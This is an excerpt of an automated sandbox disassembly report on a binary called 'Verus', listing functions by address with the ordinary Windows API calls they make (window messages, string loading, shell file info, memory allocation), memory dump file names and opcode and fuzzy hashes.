SendMessageW.USER32(?,00000409,00000000,00000000), ref: 0044C24A
LoadStringW.USER32(?,?,00000100,00000100), ref: 0044C2DA
SendMessageW.USER32(?,00000409,00000001,00000000), ref: 0044C318
SendMessageW.USER32(?,0000040B,000001FF,?), ref: 0044C32D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$LoadString
String ID:
API String ID: 4010343828-0
Opcode ID: 0f4dcadcc027afac04d8ecdc6abc6f5b8f5936def231f0fc5c5ef6c21341ad7b
Instruction ID: e43ef3ff2c7759f4d7c2ffe498cb4bab29cbe90e4facc6bfa66150205e88e524
Opcode Fuzzy Hash: 0f4dcadcc027afac04d8ecdc6abc6f5b8f5936def231f0fc5c5ef6c21341ad7b
Instruction Fuzzy Hash: 5A3125356002125BF7649AA4C891BB732D1FBD8300F58883FE6859B7C4DAF89882575E

Function 0044E030 Relevance: 6.1, APIs: 4, Instructions: 91windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0044E06B
GetMenuItemCount.USER32(?), ref: 0044E088
SendMessageW.USER32(?,00000417,?,?), ref: 0044E0B6
SendMessageW.USER32(?,0000041D,?,?), ref: 0044E0C7

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientCountItemMenuRect
String ID:
API String ID: 4098442271-0
Opcode ID: ac20f650062588449488bb536ca041fa254b468c4212e73256ef04e47be0e163
Instruction ID: 576a2b457f26fa18fe9963677a20d80e0ed6572d0c58c73b899382d6f83fb01a
Opcode Fuzzy Hash: ac20f650062588449488bb536ca041fa254b468c4212e73256ef04e47be0e163
Instruction Fuzzy Hash: 7921B1B2604250AFA750DB29988196BF7E4BBC8720F800B2FFAA983250D635DC00C799

Function 00412270 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

allocator.LIBCPMTD ref: 004122A7
allocator.LIBCONCRTD ref: 004122DB
allocator.LIBCONCRTD ref: 00412307
allocator.LIBCONCRTD ref: 00412333

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 137277016e59be906f10204365c06550a3b8a3a4fe1d3d3170e0cbff81992520
Instruction ID: 9883ab906d54f0763139764552b9d5f940a8ab78fe4cabd7f75f235409681393
Opcode Fuzzy Hash: 137277016e59be906f10204365c06550a3b8a3a4fe1d3d3170e0cbff81992520
Instruction Fuzzy Hash: 3D312EB1D001099FDB04DB99D841BEFBBB9EB48318F14012AE505B7682D77969448BA6

Function 0040E900 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

allocator.LIBCPMTD ref: 0040E937
allocator.LIBCONCRTD ref: 0040E96B
allocator.LIBCONCRTD ref: 0040E997
allocator.LIBCONCRTD ref: 0040E9C3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: c2ecc5b28943849093e8ee4d051dda3fb0e69ef140e43d15b916d7e83c287d77
Instruction ID: 565103bd665c703bf12fccc88ffb73fbcca00eb0d30b81fdf68856f8dcc2852b
Opcode Fuzzy Hash: c2ecc5b28943849093e8ee4d051dda3fb0e69ef140e43d15b916d7e83c287d77
Instruction Fuzzy Hash: 88312BB1D002089FDB04DB99D842BEFBBB9EF48318F14052EE505B7682D7796944CBA6

Function 0040AB20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

allocator.LIBCPMTD ref: 0040AB57
allocator.LIBCONCRTD ref: 0040AB8B
allocator.LIBCONCRTD ref: 0040ABB7
allocator.LIBCONCRTD ref: 0040ABE3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: allocator
String ID:
API String ID: 3447690668-0
Opcode ID: 0caf13e3eca8426db2a26b906dbacf82c2a293a8191888c6360e8cf3bfe6f67c
Instruction ID: db0d805afa818227147e98bbe5fccde2311da23b32a800801b61f8ddaed878bf
Opcode Fuzzy Hash: 0caf13e3eca8426db2a26b906dbacf82c2a293a8191888c6360e8cf3bfe6f67c
Instruction Fuzzy Hash: 21314AB1D002099FDB04DB99D842BEFBBB9EB48318F14012EE505B7782D77969448BA6

Function 0044E460 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 0044E498
_memmove_s.LIBCMT ref: 0044E4BC
__recalloc.LIBCMT ref: 0044E4DB
__recalloc.LIBCMT ref: 0044E4FA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: __recalloc_memmove_s
String ID:
API String ID: 1992126439-0
Opcode ID: 05bd4e2720248a9fdc44f4e59a4e6f93c9e9291f6c76953ca93254ae94303f53
Instruction ID: afa0cc4aeb8068da0b1f2f63a96f0056fb051207da9d59ceff54b3aa828cd37d
Opcode Fuzzy Hash: 05bd4e2720248a9fdc44f4e59a4e6f93c9e9291f6c76953ca93254ae94303f53
Instruction Fuzzy Hash: DE21D7B6600701AFE730CE6ACD84D67B7EAEFD0318714892FF886C7600EA35E841C654

Function 00447200 Relevance: 6.1, APIs: 4, Instructions: 77stringwindowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00447237

Part of subcall function 00445890: SendMessageW.USER32 ref: 004458D7

SHGetDesktopFolder.SHELL32(?,00000000), ref: 0044725D
SHGetDesktopFolder.SHELL32(?), ref: 00447291
lstrcpyW.KERNEL32(004EE93C,?), ref: 004472C8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: DesktopFolderMessageSend$lstrcpy
String ID:
API String ID: 3595981398-0
Opcode ID: 1581e095565f1d4decd2aaecd618d2e157438258f3a55dd6799d1c3d423b6ebd
Instruction ID: 82703300b3f4f7efb7c11114b8a1d558ea1d81d5cae0daa0a836954363180bf9
Opcode Fuzzy Hash: 1581e095565f1d4decd2aaecd618d2e157438258f3a55dd6799d1c3d423b6ebd
Instruction Fuzzy Hash: 3A21A371604301AFE314DFA5DC85FA7B7E8BB88300F00091EB55583291DBB4F845CBA5

Function 00458410 Relevance: 6.1, APIs: 4, Instructions: 76fileCOMMON

Download Yara Rule

APIs

DragQueryPoint.SHELL32(?,?), ref: 00458463
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0045848B
DragQueryFileW.SHELL32(?,00000000,?,00000103), ref: 0045849F
DragFinish.SHELL32(?), ref: 004584CF

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Drag$Query$File$FinishPoint
String ID:
API String ID: 4226567005-0
Opcode ID: abb593863fc1e61f238d1b2a8676a9aa48a3bf7a70f91d6051a3dc40730fae0a
Instruction ID: fd2acba115c2a27bb4cc9b1a9ba2fd0cf33b441a9520533400b5d1a46c720481
Opcode Fuzzy Hash: abb593863fc1e61f238d1b2a8676a9aa48a3bf7a70f91d6051a3dc40730fae0a
Instruction Fuzzy Hash: 3121A6711083419BD360DB65DC85FABBBE8EBC9720F00062EB85992291EF349804CB56

Function 0041E810 Relevance: 6.1, APIs: 4, Instructions: 76windowCOMMON

Download Yara Rule

APIs

GetDlgItemTextW.USER32(?,00000495,00000004,00000004), ref: 0041E838

Part of subcall function 00491B96: __wcstoi64.LIBCMT ref: 00491B8C

IsDlgButtonChecked.USER32(?,00000452), ref: 0041E865
IsDlgButtonChecked.USER32(?,000004AD), ref: 0041E87C
MessageBoxW.USER32(?,?,00000000,00000010), ref: 0041E8E4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ButtonChecked$ItemMessageText__wcstoi64
String ID:
API String ID: 2539281384-0
Opcode ID: c3a7953fc5c72bf200570605a94ae427d2f4fa91b51c799e5223be2624701278
Instruction ID: d96939400e4dab5d51795d45967c38155b627072c201293024576e798515f787
Opcode Fuzzy Hash: c3a7953fc5c72bf200570605a94ae427d2f4fa91b51c799e5223be2624701278
Instruction Fuzzy Hash: A1210EB65043006BD324DB24DC82FDB7794BB88714F00491EF289872D1D9B5E449C79A

Function 0044AED0 Relevance: 6.1, APIs: 4, Instructions: 75windowCOMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0044AEFA
GetMessagePos.USER32 ref: 0044AF0D
ScreenToClient.USER32(?,?), ref: 0044AF2B
PtInRect.USER32(?,?,?), ref: 0044AF60

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CallClientMessageProcRectScreenWindow
String ID:
API String ID: 2980354656-0
Opcode ID: 222585736520278ab971694b794048a96d89f9c3c4184a0b6eabd3e270d4c931
Instruction ID: 59d31a7d75c65eb9627218a58d1f7f3916caecf0f1f705bb75d3c3237746ff28
Opcode Fuzzy Hash: 222585736520278ab971694b794048a96d89f9c3c4184a0b6eabd3e270d4c931
Instruction Fuzzy Hash: 4011DFB67443119BE314DF59DC84DABB3E9EBC8210F44492EFD85C3201E734E91A8BA6

Function 0044C460 Relevance: 6.1, APIs: 4, Instructions: 71stringCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,?,00000100), ref: 0044C4BF
lstrlenW.KERNEL32(?), ref: 0044C4F4
lstrlenW.KERNEL32(?), ref: 0044C503
lstrcpynW.KERNEL32(?,?,00000001), ref: 0044C509

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$LoadStringlstrcpyn
String ID:
API String ID: 1900667794-0
Opcode ID: 13345410940a3568136d9fb99230e7ebcbf5519066d0d79a12262c09b3e8c6ec
Instruction ID: 166ca93bbb3561832ad7fd2a009e85f6650e8a2d60552d27e11e36555665f895
Opcode Fuzzy Hash: 13345410940a3568136d9fb99230e7ebcbf5519066d0d79a12262c09b3e8c6ec
Instruction Fuzzy Hash: 7921D471606311ABE3609F24E985BBFB7D8FF88310F08492AE896C3250DB74E9058797

Function 0046E8F0 Relevance: 6.1, APIs: 4, Instructions: 70windowstringCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,?), ref: 0046E90F
SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046E95A
lstrcmpW.KERNEL32(00000004,?,?,0000113E,00000000,?), ref: 0046E96F
SendMessageW.USER32(?,0000110A,00000006,00000000), ref: 0046E986

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$lstrcmp
String ID:
API String ID: 2087387252-0
Opcode ID: cede92e15cb549bcb84106a051068e0ad15940415ed32e1225b230e85e18b267
Instruction ID: 25dcbed32d84b5f9e352ecb0d8bcb04013b9efb769fe9db537abe387a10c3d32
Opcode Fuzzy Hash: cede92e15cb549bcb84106a051068e0ad15940415ed32e1225b230e85e18b267
Instruction Fuzzy Hash: A62138B5A45301AFC390CF6AD881A9BB7E8BF8C750F00492EB688D7350E374D9048B96

Function 0044C390 Relevance: 6.1, APIs: 4, Instructions: 69stringCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 0044C3E1
lstrlenA.KERNEL32(?), ref: 0044C412
lstrlenA.KERNEL32(?), ref: 0044C421
lstrcpynA.KERNEL32(?,?,00000001), ref: 0044C427

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$LoadStringlstrcpyn
String ID:
API String ID: 1900667794-0
Opcode ID: 41e0d863fac84c0f111ed7f64d3970cd3266fad15688ed2e16fab4271b7ed8c7
Instruction ID: fcaba8c701b47f5be68ca2f1a9c325ce995f3d29a746f11625a671c39e8a30a4
Opcode Fuzzy Hash: 41e0d863fac84c0f111ed7f64d3970cd3266fad15688ed2e16fab4271b7ed8c7
Instruction Fuzzy Hash: 8E21057120A3419BE360DF14EA91BBBBBD8BFD5300F48482EE981C3211CB78D84587E6

Function 00468BA0 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,00000018,?), ref: 00468BCE
SetWindowPos.USER32(?,000000FF,00000000,00000000,?,?,00000002), ref: 00468BFB
GetWindowLongW.USER32(?,000000EC), ref: 00468C31
SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00468C49

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Long$Object
String ID:
API String ID: 1076950301-0
Opcode ID: 232ed99dd96051f25e66bf31441c25c2a87a67c46be79ff5b08dec4abe29be3e
Instruction ID: 310f6d8702f5c8779bf985a662aa6081eb0c3646d1338a78cc979221cb5f2be8
Opcode Fuzzy Hash: 232ed99dd96051f25e66bf31441c25c2a87a67c46be79ff5b08dec4abe29be3e
Instruction Fuzzy Hash: F6213AB1508300AFD354DF65D984B5BBBE8FB88710F104A2EF59AD7280EB74A504CF6A

Function 00444EC0 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00000208), ref: 00444F0A
lstrcpyW.KERNEL32(?,?), ref: 00444F19
SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,0000C009), ref: 00444F3A
SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,0000400B), ref: 00444F62

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FileInfo$lstrcpy
String ID:
API String ID: 3710395854-0
Opcode ID: 1ccd2bbb231ee4b0aa5333c12ebcb3dddd2c4d7ba0837e021b20a08419b80ff0
Instruction ID: 8c0068107e70c9a7140c84e5ddb6c0210ba78cc859929e027e5a63afb2eaaab4
Opcode Fuzzy Hash: 1ccd2bbb231ee4b0aa5333c12ebcb3dddd2c4d7ba0837e021b20a08419b80ff0
